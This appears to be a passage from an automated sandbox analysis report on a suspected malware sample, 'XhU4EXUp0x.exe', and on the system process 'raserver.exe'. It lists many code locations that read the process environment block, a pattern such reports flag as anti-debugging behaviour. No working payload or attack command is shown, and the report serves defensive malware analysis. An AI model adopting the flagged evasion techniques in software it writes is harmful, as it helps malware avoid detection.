          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197C577 mov eax, dword ptr fs:[00000030h]3_2_0197C577
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197C577 mov eax, dword ptr fs:[00000030h]3_2_0197C577
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A03D40 mov eax, dword ptr fs:[00000030h]3_2_01A03D40
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0196849B mov eax, dword ptr fs:[00000030h]3_2_0196849B
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A114FB mov eax, dword ptr fs:[00000030h]3_2_01A114FB
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D6CF0 mov eax, dword ptr fs:[00000030h]3_2_019D6CF0
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D6CF0 mov eax, dword ptr fs:[00000030h]3_2_019D6CF0
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D6CF0 mov eax, dword ptr fs:[00000030h]3_2_019D6CF0
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A28CD6 mov eax, dword ptr fs:[00000030h]3_2_01A28CD6
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D6C0A mov eax, dword ptr fs:[00000030h]3_2_019D6C0A
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D6C0A mov eax, dword ptr fs:[00000030h]3_2_019D6C0A
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D6C0A mov eax, dword ptr fs:[00000030h]3_2_019D6C0A
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D6C0A mov eax, dword ptr fs:[00000030h]3_2_019D6C0A
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A11C06 mov eax, dword ptr fs:[00000030h]3_2_01A11C06
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A11C06 mov eax, dword ptr fs:[00000030h]3_2_01A11C06
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A11C06 mov eax, dword ptr fs:[00000030h]3_2_01A11C06
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A11C06 mov eax, dword ptr fs:[00000030h]3_2_01A11C06
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A11C06 mov eax, dword ptr fs:[00000030h]3_2_01A11C06
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A11C06 mov eax, dword ptr fs:[00000030h]3_2_01A11C06
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A11C06 mov eax, dword ptr fs:[00000030h]3_2_01A11C06
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A11C06 mov eax, dword ptr fs:[00000030h]3_2_01A11C06
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A11C06 mov eax, dword ptr fs:[00000030h]3_2_01A11C06
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A11C06 mov eax, dword ptr fs:[00000030h]3_2_01A11C06
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A11C06 mov eax, dword ptr fs:[00000030h]3_2_01A11C06
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A11C06 mov eax, dword ptr fs:[00000030h]3_2_01A11C06
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A11C06 mov eax, dword ptr fs:[00000030h]3_2_01A11C06
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A11C06 mov eax, dword ptr fs:[00000030h]3_2_01A11C06
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A2740D mov eax, dword ptr fs:[00000030h]3_2_01A2740D
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A2740D mov eax, dword ptr fs:[00000030h]3_2_01A2740D
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A2740D mov eax, dword ptr fs:[00000030h]3_2_01A2740D
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198BC2C mov eax, dword ptr fs:[00000030h]3_2_0198BC2C
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019EC450 mov eax, dword ptr fs:[00000030h]3_2_019EC450
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019EC450 mov eax, dword ptr fs:[00000030h]3_2_019EC450
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198A44B mov eax, dword ptr fs:[00000030h]3_2_0198A44B
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198AC7B mov eax, dword ptr fs:[00000030h]3_2_0198AC7B
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198AC7B mov eax, dword ptr fs:[00000030h]3_2_0198AC7B
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198AC7B mov eax, dword ptr fs:[00000030h]3_2_0198AC7B
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198AC7B mov eax, dword ptr fs:[00000030h]3_2_0198AC7B
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198AC7B mov eax, dword ptr fs:[00000030h]3_2_0198AC7B
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198AC7B mov eax, dword ptr fs:[00000030h]3_2_0198AC7B
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198AC7B mov eax, dword ptr fs:[00000030h]3_2_0198AC7B
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198AC7B mov eax, dword ptr fs:[00000030h]3_2_0198AC7B
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198AC7B mov eax, dword ptr fs:[00000030h]3_2_0198AC7B
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198AC7B mov eax, dword ptr fs:[00000030h]3_2_0198AC7B
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198AC7B mov eax, dword ptr fs:[00000030h]3_2_0198AC7B
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197746D mov eax, dword ptr fs:[00000030h]3_2_0197746D
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01968794 mov eax, dword ptr fs:[00000030h]3_2_01968794
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D7794 mov eax, dword ptr fs:[00000030h]3_2_019D7794
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D7794 mov eax, dword ptr fs:[00000030h]3_2_019D7794
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D7794 mov eax, dword ptr fs:[00000030h]3_2_019D7794
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019937F5 mov eax, dword ptr fs:[00000030h]3_2_019937F5
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197F716 mov eax, dword ptr fs:[00000030h]3_2_0197F716
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019EFF10 mov eax, dword ptr fs:[00000030h]3_2_019EFF10
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019EFF10 mov eax, dword ptr fs:[00000030h]3_2_019EFF10
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198A70E mov eax, dword ptr fs:[00000030h]3_2_0198A70E
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198A70E mov eax, dword ptr fs:[00000030h]3_2_0198A70E
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198E730 mov eax, dword ptr fs:[00000030h]3_2_0198E730
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197B73D mov eax, dword ptr fs:[00000030h]3_2_0197B73D
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197B73D mov eax, dword ptr fs:[00000030h]3_2_0197B73D
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A2070D mov eax, dword ptr fs:[00000030h]3_2_01A2070D
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A2070D mov eax, dword ptr fs:[00000030h]3_2_01A2070D
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01954F2E mov eax, dword ptr fs:[00000030h]3_2_01954F2E
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01954F2E mov eax, dword ptr fs:[00000030h]3_2_01954F2E
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A28F6A mov eax, dword ptr fs:[00000030h]3_2_01A28F6A
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0196EF40 mov eax, dword ptr fs:[00000030h]3_2_0196EF40
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0196FF60 mov eax, dword ptr fs:[00000030h]3_2_0196FF60
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A20EA5 mov eax, dword ptr fs:[00000030h]3_2_01A20EA5
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A20EA5 mov eax, dword ptr fs:[00000030h]3_2_01A20EA5
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A20EA5 mov eax, dword ptr fs:[00000030h]3_2_01A20EA5
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019EFE87 mov eax, dword ptr fs:[00000030h]3_2_019EFE87
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D46A7 mov eax, dword ptr fs:[00000030h]3_2_019D46A7
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019836CC mov eax, dword ptr fs:[00000030h]3_2_019836CC
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01998EC7 mov eax, dword ptr fs:[00000030h]3_2_01998EC7
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A0FEC0 mov eax, dword ptr fs:[00000030h]3_2_01A0FEC0
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A28ED6 mov eax, dword ptr fs:[00000030h]3_2_01A28ED6
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019676E2 mov eax, dword ptr fs:[00000030h]3_2_019676E2
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019816E0 mov ecx, dword ptr fs:[00000030h]3_2_019816E0
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198A61C mov eax, dword ptr fs:[00000030h]3_2_0198A61C
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198A61C mov eax, dword ptr fs:[00000030h]3_2_0198A61C
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0195C600 mov eax, dword ptr fs:[00000030h]3_2_0195C600
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0195C600 mov eax, dword ptr fs:[00000030h]3_2_0195C600
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0195C600 mov eax, dword ptr fs:[00000030h]3_2_0195C600
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01988E00 mov eax, dword ptr fs:[00000030h]3_2_01988E00
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A0FE3F mov eax, dword ptr fs:[00000030h]3_2_01A0FE3F
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A11608 mov eax, dword ptr fs:[00000030h]3_2_01A11608
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0195E620 mov eax, dword ptr fs:[00000030h]3_2_0195E620
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01967E41 mov eax, dword ptr fs:[00000030h]3_2_01967E41
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01967E41 mov eax, dword ptr fs:[00000030h]3_2_01967E41
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01967E41 mov eax, dword ptr fs:[00000030h]3_2_01967E41
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01967E41 mov eax, dword ptr fs:[00000030h]3_2_01967E41
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01967E41 mov eax, dword ptr fs:[00000030h]3_2_01967E41
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01967E41 mov eax, dword ptr fs:[00000030h]3_2_01967E41
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197AE73 mov eax, dword ptr fs:[00000030h]3_2_0197AE73
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197AE73 mov eax, dword ptr fs:[00000030h]3_2_0197AE73
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197AE73 mov eax, dword ptr fs:[00000030h]3_2_0197AE73
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197AE73 mov eax, dword ptr fs:[00000030h]3_2_0197AE73
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197AE73 mov eax, dword ptr fs:[00000030h]3_2_0197AE73
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A1AE44 mov eax, dword ptr fs:[00000030h]3_2_01A1AE44
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A1AE44 mov eax, dword ptr fs:[00000030h]3_2_01A1AE44
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0196766D mov eax, dword ptr fs:[00000030h]3_2_0196766D
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B1849B mov eax, dword ptr fs:[00000030h]12_2_04B1849B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC4496 mov eax, dword ptr fs:[00000030h]12_2_04BC4496
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC4496 mov eax, dword ptr fs:[00000030h]12_2_04BC4496
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC4496 mov eax, dword ptr fs:[00000030h]12_2_04BC4496
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC4496 mov eax, dword ptr fs:[00000030h]12_2_04BC4496
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC4496 mov eax, dword ptr fs:[00000030h]12_2_04BC4496
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC4496 mov eax, dword ptr fs:[00000030h]12_2_04BC4496
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC4496 mov eax, dword ptr fs:[00000030h]12_2_04BC4496
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC4496 mov eax, dword ptr fs:[00000030h]12_2_04BC4496
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC4496 mov eax, dword ptr fs:[00000030h]12_2_04BC4496
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC4496 mov eax, dword ptr fs:[00000030h]12_2_04BC4496
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC4496 mov eax, dword ptr fs:[00000030h]12_2_04BC4496
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC4496 mov eax, dword ptr fs:[00000030h]12_2_04BC4496
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC4496 mov eax, dword ptr fs:[00000030h]12_2_04BC4496
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC14FB mov eax, dword ptr fs:[00000030h]12_2_04BC14FB
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B86CF0 mov eax, dword ptr fs:[00000030h]12_2_04B86CF0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B86CF0 mov eax, dword ptr fs:[00000030h]12_2_04B86CF0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B86CF0 mov eax, dword ptr fs:[00000030h]12_2_04B86CF0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BD8CD6 mov eax, dword ptr fs:[00000030h]12_2_04BD8CD6
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B3BC2C mov eax, dword ptr fs:[00000030h]12_2_04B3BC2C
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BD740D mov eax, dword ptr fs:[00000030h]12_2_04BD740D
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BD740D mov eax, dword ptr fs:[00000030h]12_2_04BD740D
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BD740D mov eax, dword ptr fs:[00000030h]12_2_04BD740D
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B86C0A mov eax, dword ptr fs:[00000030h]12_2_04B86C0A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B86C0A mov eax, dword ptr fs:[00000030h]12_2_04B86C0A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B86C0A mov eax, dword ptr fs:[00000030h]12_2_04B86C0A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B86C0A mov eax, dword ptr fs:[00000030h]12_2_04B86C0A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC1C06 mov eax, dword ptr fs:[00000030h]12_2_04BC1C06
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC1C06 mov eax, dword ptr fs:[00000030h]12_2_04BC1C06
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC1C06 mov eax, dword ptr fs:[00000030h]12_2_04BC1C06
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC1C06 mov eax, dword ptr fs:[00000030h]12_2_04BC1C06
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC1C06 mov eax, dword ptr fs:[00000030h]12_2_04BC1C06
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC1C06 mov eax, dword ptr fs:[00000030h]12_2_04BC1C06
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC1C06 mov eax, dword ptr fs:[00000030h]12_2_04BC1C06
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC1C06 mov eax, dword ptr fs:[00000030h]12_2_04BC1C06
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC1C06 mov eax, dword ptr fs:[00000030h]12_2_04BC1C06
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC1C06 mov eax, dword ptr fs:[00000030h]12_2_04BC1C06
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC1C06 mov eax, dword ptr fs:[00000030h]12_2_04BC1C06
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC1C06 mov eax, dword ptr fs:[00000030h]12_2_04BC1C06
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC1C06 mov eax, dword ptr fs:[00000030h]12_2_04BC1C06
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC1C06 mov eax, dword ptr fs:[00000030h]12_2_04BC1C06
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B3AC7B mov eax, dword ptr fs:[00000030h]12_2_04B3AC7B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B3AC7B mov eax, dword ptr fs:[00000030h]12_2_04B3AC7B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B3AC7B mov eax, dword ptr fs:[00000030h]12_2_04B3AC7B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B3AC7B mov eax, dword ptr fs:[00000030h]12_2_04B3AC7B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B3AC7B mov eax, dword ptr fs:[00000030h]12_2_04B3AC7B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B3AC7B mov eax, dword ptr fs:[00000030h]12_2_04B3AC7B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B3AC7B mov eax, dword ptr fs:[00000030h]12_2_04B3AC7B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B3AC7B mov eax, dword ptr fs:[00000030h]12_2_04B3AC7B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B3AC7B mov eax, dword ptr fs:[00000030h]12_2_04B3AC7B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B3AC7B mov eax, dword ptr fs:[00000030h]12_2_04B3AC7B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B3AC7B mov eax, dword ptr fs:[00000030h]12_2_04B3AC7B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B2746D mov eax, dword ptr fs:[00000030h]12_2_04B2746D
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B9C450 mov eax, dword ptr fs:[00000030h]12_2_04B9C450
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B9C450 mov eax, dword ptr fs:[00000030h]12_2_04B9C450
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B3A44B mov eax, dword ptr fs:[00000030h]12_2_04B3A44B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B31DB5 mov eax, dword ptr fs:[00000030h]12_2_04B31DB5
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B31DB5 mov eax, dword ptr fs:[00000030h]12_2_04B31DB5
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B31DB5 mov eax, dword ptr fs:[00000030h]12_2_04B31DB5
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BD05AC mov eax, dword ptr fs:[00000030h]12_2_04BD05AC
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BD05AC mov eax, dword ptr fs:[00000030h]12_2_04BD05AC
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B335A1 mov eax, dword ptr fs:[00000030h]12_2_04B335A1
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B3FD9B mov eax, dword ptr fs:[00000030h]12_2_04B3FD9B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B3FD9B mov eax, dword ptr fs:[00000030h]12_2_04B3FD9B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B32581 mov eax, dword ptr fs:[00000030h]12_2_04B32581
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B32581 mov eax, dword ptr fs:[00000030h]12_2_04B32581
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B32581 mov eax, dword ptr fs:[00000030h]12_2_04B32581
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B32581 mov eax, dword ptr fs:[00000030h]12_2_04B32581
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B02D8A mov eax, dword ptr fs:[00000030h]12_2_04B02D8A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B02D8A mov eax, dword ptr fs:[00000030h]12_2_04B02D8A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B02D8A mov eax, dword ptr fs:[00000030h]12_2_04B02D8A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B02D8A mov eax, dword ptr fs:[00000030h]12_2_04B02D8A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B02D8A mov eax, dword ptr fs:[00000030h]12_2_04B02D8A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC2D82 mov eax, dword ptr fs:[00000030h]12_2_04BC2D82
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC2D82 mov eax, dword ptr fs:[00000030h]12_2_04BC2D82
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC2D82 mov eax, dword ptr fs:[00000030h]12_2_04BC2D82
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC2D82 mov eax, dword ptr fs:[00000030h]12_2_04BC2D82
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC2D82 mov eax, dword ptr fs:[00000030h]12_2_04BC2D82
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC2D82 mov eax, dword ptr fs:[00000030h]12_2_04BC2D82
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC2D82 mov eax, dword ptr fs:[00000030h]12_2_04BC2D82
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BB8DF1 mov eax, dword ptr fs:[00000030h]12_2_04BB8DF1
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B1D5E0 mov eax, dword ptr fs:[00000030h]12_2_04B1D5E0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B1D5E0 mov eax, dword ptr fs:[00000030h]12_2_04B1D5E0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BCFDE2 mov eax, dword ptr fs:[00000030h]12_2_04BCFDE2
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BCFDE2 mov eax, dword ptr fs:[00000030h]12_2_04BCFDE2
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BCFDE2 mov eax, dword ptr fs:[00000030h]12_2_04BCFDE2
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BCFDE2 mov eax, dword ptr fs:[00000030h]12_2_04BCFDE2
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B86DC9 mov eax, dword ptr fs:[00000030h]12_2_04B86DC9
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B86DC9 mov eax, dword ptr fs:[00000030h]12_2_04B86DC9
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B86DC9 mov eax, dword ptr fs:[00000030h]12_2_04B86DC9
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B86DC9 mov ecx, dword ptr fs:[00000030h]12_2_04B86DC9
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B86DC9 mov eax, dword ptr fs:[00000030h]12_2_04B86DC9
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B86DC9 mov eax, dword ptr fs:[00000030h]12_2_04B86DC9
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B0AD30 mov eax, dword ptr fs:[00000030h]12_2_04B0AD30
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B13D34 mov eax, dword ptr fs:[00000030h]12_2_04B13D34
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B13D34 mov eax, dword ptr fs:[00000030h]12_2_04B13D34
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B13D34 mov eax, dword ptr fs:[00000030h]12_2_04B13D34
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B13D34 mov eax, dword ptr fs:[00000030h]12_2_04B13D34
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B13D34 mov eax, dword ptr fs:[00000030h]12_2_04B13D34
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B13D34 mov eax, dword ptr fs:[00000030h]12_2_04B13D34
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B13D34 mov eax, dword ptr fs:[00000030h]12_2_04B13D34
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B13D34 mov eax, dword ptr fs:[00000030h]12_2_04B13D34
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B13D34 mov eax, dword ptr fs:[00000030h]12_2_04B13D34
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B13D34 mov eax, dword ptr fs:[00000030h]12_2_04B13D34
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B13D34 mov eax, dword ptr fs:[00000030h]12_2_04B13D34
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B13D34 mov eax, dword ptr fs:[00000030h]12_2_04B13D34
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B13D34 mov eax, dword ptr fs:[00000030h]12_2_04B13D34
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BCE539 mov eax, dword ptr fs:[00000030h]12_2_04BCE539
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B34D3B mov eax, dword ptr fs:[00000030h]12_2_04B34D3B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B34D3B mov eax, dword ptr fs:[00000030h]12_2_04B34D3B
